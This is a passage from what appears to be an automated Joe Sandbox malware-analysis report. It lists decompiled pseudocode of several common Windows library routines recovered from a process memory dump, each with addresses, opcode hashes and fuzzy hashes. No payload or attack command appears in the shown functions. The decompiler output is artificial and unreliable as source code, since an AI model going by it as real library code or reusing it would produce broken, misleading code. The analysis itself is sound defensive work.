								_t79 = E055EE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x5581668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E056251BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x558166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E055D2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E055B6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E055D2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E055BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E055D2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E055D2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E055D2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E055FD0D1(_t62);
				goto L28;
			}





















                                                                        0x055d2990
                                                                        0x055d2992
                                                                        0x055d2997
                                                                        0x055d29a3
                                                                        0x055d29a6
                                                                        0x055d29ab
                                                                        0x055d29ad
                                                                        0x055d29b2
                                                                        0x05615c80
                                                                        0x055d29b8
                                                                        0x055d29b8
                                                                        0x055d29bb
                                                                        0x055d29c0
                                                                        0x055d29c5
                                                                        0x055d29c6
                                                                        0x055d29c6
                                                                        0x055d29cb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d29cd
                                                                        0x055d29d0
                                                                        0x055d29d9
                                                                        0x055d29db
                                                                        0x055d29dd
                                                                        0x055d2a7f
                                                                        0x055d2a84
                                                                        0x055d2a87
                                                                        0x055d2a89
                                                                        0x05615ca1
                                                                        0x05615ca3
                                                                        0x00000000
                                                                        0x055d2a8f
                                                                        0x055d2a8f
                                                                        0x00000000
                                                                        0x055d2a8f
                                                                        0x00000000
                                                                        0x055d29e3
                                                                        0x055d29e3
                                                                        0x055d29e3
                                                                        0x00000000
                                                                        0x055d29e3
                                                                        0x055d29dd
                                                                        0x00000000
                                                                        0x055d29db
                                                                        0x055d29e6
                                                                        0x055d29e9
                                                                        0x055d29eb
                                                                        0x055d29ed
                                                                        0x055d29f3
                                                                        0x055d29f5
                                                                        0x055d29f8
                                                                        0x055d29fa
                                                                        0x055d2a97
                                                                        0x055d2a9a
                                                                        0x055d2a9d
                                                                        0x055d2add
                                                                        0x00000000
                                                                        0x055d2a9f
                                                                        0x055d2aa2
                                                                        0x055d2aa5
                                                                        0x055d2aa8
                                                                        0x055d2aab
                                                                        0x05615cab
                                                                        0x05615caf
                                                                        0x05615cc5
                                                                        0x05615cda
                                                                        0x05615cdc
                                                                        0x05615cdf
                                                                        0x05615ce5
                                                                        0x00000000
                                                                        0x05615ceb
                                                                        0x05615ced
                                                                        0x05615cee
                                                                        0x00000000
                                                                        0x05615cee
                                                                        0x05615cb1
                                                                        0x05615cb4
                                                                        0x05615cb9
                                                                        0x05615cbb
                                                                        0x00000000
                                                                        0x05615cbd
                                                                        0x05615cbd
                                                                        0x00000000
                                                                        0x05615cbd
                                                                        0x05615cbb
                                                                        0x055d2ab1
                                                                        0x055d2ab1
                                                                        0x055d2ac4
                                                                        0x055d2ac6
                                                                        0x055d2ac6
                                                                        0x00000000
                                                                        0x055d2ac6
                                                                        0x055d2aab
                                                                        0x00000000
                                                                        0x055d2a00
                                                                        0x055d2a09
                                                                        0x055d2a0e
                                                                        0x055d2a21
                                                                        0x055d2a24
                                                                        0x055d2a35
                                                                        0x055d2a3a
                                                                        0x055d2a3d
                                                                        0x055d2a42
                                                                        0x055d2a59
                                                                        0x055d2a59
                                                                        0x055d2a5c
                                                                        0x055d2a5f
                                                                        0x055d2a5f
                                                                        0x055d29fa
                                                                        0x055d29f3
                                                                        0x055d2a64
                                                                        0x055d2a64
                                                                        0x055d2a6b
                                                                        0x055d2a6b
                                                                        0x055d2a6d
                                                                        0x055d2a72
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e51d321f9b557180216b6d9e8a4f7ed61d07528dd654e790dc63b4d84992926c
                                                                        • Instruction ID: 2594cb52460d1d16c9a7cd5bf44abf828081752d66670a387c197eb85494fb6e
                                                                        • Opcode Fuzzy Hash: e51d321f9b557180216b6d9e8a4f7ed61d07528dd654e790dc63b4d84992926c
                                                                        • Instruction Fuzzy Hash: 48514B76A0020ADFCF25DF59C844AEEBBB6FF48310F048059E815AB720D3759952CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D4D3B Relevance: .1, Instructions: 131COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 78%
                                                                        			E055D4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x569d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E055EFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x5697bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E055EB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L055C4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E055ACCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E055EB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E055EF380(_t67 + 0xc, 0x5585138, 0x10) == 0) {
								 *0x56960d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E055D4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E055D4E70(0x56986b0, 0x55d5690, 0, 0) != 0) {
					_t46 = E055ACCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                                        0x055d4d3b
                                                                        0x055d4d4d
                                                                        0x055d4d53
                                                                        0x055d4d58
                                                                        0x055d4d65
                                                                        0x055d4d6c
                                                                        0x055d4d71
                                                                        0x055d4d77
                                                                        0x055d4d7f
                                                                        0x055d4d8c
                                                                        0x055d4d8e
                                                                        0x055d4dad
                                                                        0x055d4db0
                                                                        0x055d4db7
                                                                        0x055d4db8
                                                                        0x055d4db9
                                                                        0x055d4dba
                                                                        0x055d4dbb
                                                                        0x055d4dc1
                                                                        0x055d4dc8
                                                                        0x055d4dcc
                                                                        0x055d4dd5
                                                                        0x055d4dde
                                                                        0x055d4ddf
                                                                        0x055d4de0
                                                                        0x055d4de1
                                                                        0x055d4de6
                                                                        0x055d4de7
                                                                        0x055d4de9
                                                                        0x055d4df3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05616c7c
                                                                        0x05616c8a
                                                                        0x05616c8a
                                                                        0x05616c9d
                                                                        0x05616ca7
                                                                        0x05616cac
                                                                        0x05616cb2
                                                                        0x05616cb9
                                                                        0x00000000
                                                                        0x05616cbf
                                                                        0x05616cbf
                                                                        0x00000000
                                                                        0x05616cbf
                                                                        0x05616cb9
                                                                        0x055d4dfb
                                                                        0x05616ccf
                                                                        0x05616cd3
                                                                        0x055d4e32
                                                                        0x055d4e39
                                                                        0x05616ce0
                                                                        0x05616cf2
                                                                        0x05616cf2
                                                                        0x05616ce0
                                                                        0x055d4e3f
                                                                        0x055d4e41
                                                                        0x055d4e51
                                                                        0x055d4e51
                                                                        0x055d4e03
                                                                        0x055d4e03
                                                                        0x055d4e09
                                                                        0x055d4e0f
                                                                        0x055d4e57
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d4e1b
                                                                        0x055d4e30
                                                                        0x055d4e5b
                                                                        0x055d4e5b
                                                                        0x00000000
                                                                        0x055d4e30
                                                                        0x055d4e11
                                                                        0x055d4e11
                                                                        0x055d4e16
                                                                        0x00000000
                                                                        0x055d4e16
                                                                        0x055d4e01
                                                                        0x00000000
                                                                        0x055d4e01
                                                                        0x055d4da5
                                                                        0x05616c6b
                                                                        0x00000000
                                                                        0x055d4dab
                                                                        0x055d4dab
                                                                        0x00000000
                                                                        0x055d4dab

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 83a3128558a599ccb4b5bfb3125c091f26d6bd0f30937e6bd5fdb935b16231d6
                                                                        • Instruction ID: f3ca8f2d330b946e3d37678600538f3d370e99f5a7291d4b5a1bb2bee9bde463
                                                                        • Opcode Fuzzy Hash: 83a3128558a599ccb4b5bfb3125c091f26d6bd0f30937e6bd5fdb935b16231d6
                                                                        • Instruction Fuzzy Hash: 6C419176A40318EFEF31DF18C885F6AB7AAFB45610F040099E9459B680DBB0DD44CBA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D4BAD Relevance: .1, Instructions: 131COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 85%
                                                                        			E055D4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x569d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E055ACC50(_t86);
					L11:
					return E055EB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x5698504
				E055C2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E055EFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E055EB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L055C4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E055ACCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x5698504
								E055BFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E055D4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                                        0x055d4bad
                                                                        0x055d4bbf
                                                                        0x055d4bc2
                                                                        0x055d4bc6
                                                                        0x055d4bcd
                                                                        0x055d4bd9
                                                                        0x056167fe
                                                                        0x05616800
                                                                        0x055d4ccc
                                                                        0x055d4ccd
                                                                        0x055d4cb7
                                                                        0x055d4cc9
                                                                        0x055d4cc9
                                                                        0x055d4bdf
                                                                        0x055d4be5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d4beb
                                                                        0x055d4bef
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d4bf5
                                                                        0x055d4bf9
                                                                        0x055d4c06
                                                                        0x055d4c0b
                                                                        0x055d4c17
                                                                        0x055d4c1c
                                                                        0x055d4c1f
                                                                        0x055d4c25
                                                                        0x055d4c33
                                                                        0x055d4c3d
                                                                        0x055d4c40
                                                                        0x055d4c43
                                                                        0x055d4c47
                                                                        0x055d4c4d
                                                                        0x055d4c53
                                                                        0x055d4c54
                                                                        0x055d4c55
                                                                        0x055d4c56
                                                                        0x055d4c5b
                                                                        0x055d4c5c
                                                                        0x055d4c63
                                                                        0x055d4c6b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05616776
                                                                        0x05616784
                                                                        0x05616784
                                                                        0x0561679f
                                                                        0x056167a7
                                                                        0x056167af
                                                                        0x056167ce
                                                                        0x00000000
                                                                        0x056167b1
                                                                        0x056167b7
                                                                        0x056167b8
                                                                        0x056167c1
                                                                        0x056167d3
                                                                        0x056167d9
                                                                        0x056167dd
                                                                        0x055d4c94
                                                                        0x055d4c94
                                                                        0x055d4c98
                                                                        0x055d4c9c
                                                                        0x055d4ca3
                                                                        0x056167f4
                                                                        0x056167f4
                                                                        0x055d4cb5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d4cb5
                                                                        0x055d4c79
                                                                        0x055d4c7e
                                                                        0x055d4c89
                                                                        0x055d4c8b
                                                                        0x055d4c8f
                                                                        0x055d4c8f
                                                                        0x00000000
                                                                        0x055d4c89
                                                                        0x056167c3
                                                                        0x00000000
                                                                        0x056167c3
                                                                        0x056167af
                                                                        0x055d4c73
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7c87eff02e06a06b27a5be3040cdfb1953a69a8aede3e634bbd306fc9a83fe72
                                                                        • Instruction ID: b5cae07b541f0df98eda208a23e91612fb60e7348bc31d5239eee3768c4c1871
                                                                        • Opcode Fuzzy Hash: 7c87eff02e06a06b27a5be3040cdfb1953a69a8aede3e634bbd306fc9a83fe72
                                                                        • Instruction Fuzzy Hash: B0419136A00229DACF30DF68C944FEAB7B5BF45710F0504A9E909AB750DA749E80CB94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055B8A0A Relevance: .1, Instructions: 120COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E055B8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x569d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E055EB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E055BE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x5581180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E055D1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E055E3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E055B8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                                        0x055b8a0a
                                                                        0x055b8a1c
                                                                        0x055b8a23
                                                                        0x055b8a2e
                                                                        0x055b8a30
                                                                        0x055b8a36
                                                                        0x055b8a3c
                                                                        0x055b8a3e
                                                                        0x055b8a4a
                                                                        0x055b8a52
                                                                        0x055b8a9c
                                                                        0x055b8aae
                                                                        0x055b8a58
                                                                        0x055b8a5e
                                                                        0x055b8a6a
                                                                        0x055b8a6f
                                                                        0x055b8a75
                                                                        0x055b8a7d
                                                                        0x055b8a85
                                                                        0x055b8a86
                                                                        0x055b8a89
                                                                        0x055b8a93
                                                                        0x055b8a99
                                                                        0x055b8a9b
                                                                        0x00000000
                                                                        0x055b8aaf
                                                                        0x055b8abe
                                                                        0x055b8ac3
                                                                        0x055b8acb
                                                                        0x055b8ad7
                                                                        0x055b8ae0
                                                                        0x055b8af1
                                                                        0x00000000
                                                                        0x055b8af1
                                                                        0x055b8acd
                                                                        0x055b8ad5
                                                                        0x055b8afb
                                                                        0x055b8afd
                                                                        0x055b8aff
                                                                        0x055b8b07
                                                                        0x055b8b22
                                                                        0x055b8b24
                                                                        0x055b8b2a
                                                                        0x055b8b2e
                                                                        0x055b8b3f
                                                                        0x055b8b78
                                                                        0x055b8b41
                                                                        0x055b8b52
                                                                        0x055b8b54
                                                                        0x055b8b5c
                                                                        0x055b8b74
                                                                        0x055b8b74
                                                                        0x055b8b5c
                                                                        0x055b8b3f
                                                                        0x055b8b5e
                                                                        0x055b8b61
                                                                        0x055b8b64
                                                                        0x055b8b64
                                                                        0x055b8b6c
                                                                        0x055b8b6c
                                                                        0x055b8b11
                                                                        0x05609cd5
                                                                        0x05609cd5
                                                                        0x055b8b17
                                                                        0x055b8b1a
                                                                        0x055b8b1a
                                                                        0x00000000
                                                                        0x055b8ad5
                                                                        0x055b8a89

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1f8c6b08f2158552119699c86983a203d19cba53f93414a2a01809cab5de815f
                                                                        • Instruction ID: d78239af857d56ed4796f9fe5e4bb13e6c35930cb3121f7e637470669b6ffc8d
                                                                        • Opcode Fuzzy Hash: 1f8c6b08f2158552119699c86983a203d19cba53f93414a2a01809cab5de815f
                                                                        • Instruction Fuzzy Hash: B34162B5A0022D9BEB24DF65C88CAF9B7F9FB84310F1055E9D81997241E7B09E85CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0566AA16 Relevance: .1, Instructions: 120COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0566AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0566ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0566AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0566AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0564CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L055C77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E055C7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0566131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0564CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                                                        0x0566aa1f
                                                                        0x0566aa21
                                                                        0x0566aa23
                                                                        0x0566aa2b
                                                                        0x0566aa30
                                                                        0x0566aa36
                                                                        0x0566aa39
                                                                        0x0566aa42
                                                                        0x0566aa75
                                                                        0x0566aa7a
                                                                        0x0566aa7c
                                                                        0x0566aa7c
                                                                        0x0566aa88
                                                                        0x0566aa8a
                                                                        0x0566aa8f
                                                                        0x0566ab02
                                                                        0x0566ab04
                                                                        0x0566aa99
                                                                        0x0566aaa8
                                                                        0x0566aaaf
                                                                        0x0566aab3
                                                                        0x0566aacc
                                                                        0x0566aad1
                                                                        0x0566aad6
                                                                        0x0566aae0
                                                                        0x0566aaf3
                                                                        0x0566aaf9
                                                                        0x0566aafe
                                                                        0x0566aafe
                                                                        0x0566aaf3
                                                                        0x0566aad6
                                                                        0x0566aab3
                                                                        0x0566ab07
                                                                        0x0566ab0a
                                                                        0x0566ab11
                                                                        0x0566ab23
                                                                        0x0566ab13
                                                                        0x0566ab1c
                                                                        0x0566ab1c
                                                                        0x0566ab2b
                                                                        0x0566ab44
                                                                        0x0566ab44
                                                                        0x0566ab51
                                                                        0x0566ab51
                                                                        0x0566aa44
                                                                        0x0566aa47
                                                                        0x0566aa4c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0566aa5a
                                                                        0x0566aa64
                                                                        0x0566aa72
                                                                        0x00000000
                                                                        0x0566aa66
                                                                        0x0566aa66
                                                                        0x0566aa68
                                                                        0x0566aa6a
                                                                        0x00000000
                                                                        0x0566aa6a

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
